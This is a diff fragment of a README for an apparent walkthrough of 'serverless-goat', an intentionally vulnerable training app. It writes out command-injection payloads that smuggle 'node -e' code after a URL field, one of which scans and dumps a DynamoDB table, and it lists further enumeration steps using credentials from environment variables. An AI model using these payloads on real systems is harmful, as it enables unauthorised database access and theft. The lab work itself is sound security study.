metalmandalore/serverless-goat-walkthrough/README.md

 `https://enum; node -e 'const AWS = require(\"aws-sdk\"); (async () => {console.log("Running Node.js" + process.version))})();'`
 2. Can the database be scanned?
 `https://enum; node -e 'const AWS = require(\"aws-sdk\"); (async () => {console.log(await new AWS.DynamoDB.DocumentClient().scan({TableName: process.env.TABLE_NAME}).promise());})();'`
-3. Can the database be queried?
+3. Potential further questions to be answered by node.js if you're a guru:
-4. Does GetItem work?
+      * Can the database be queried?
-5. Does PutItem work?
+      * Does GetItem work?
-6. Does UpdateItem work?
+      * Does PutItem work?
-???
-Do I enumerate all the things?
-Can I automate this?
+      * Does UpdateItem work?
-7. Can the s3 buckets be scanned?
+      * Can the s3 buckets be scanned?

 #### Profile Enumeration
 1. Using the information found in the env variables create a user profile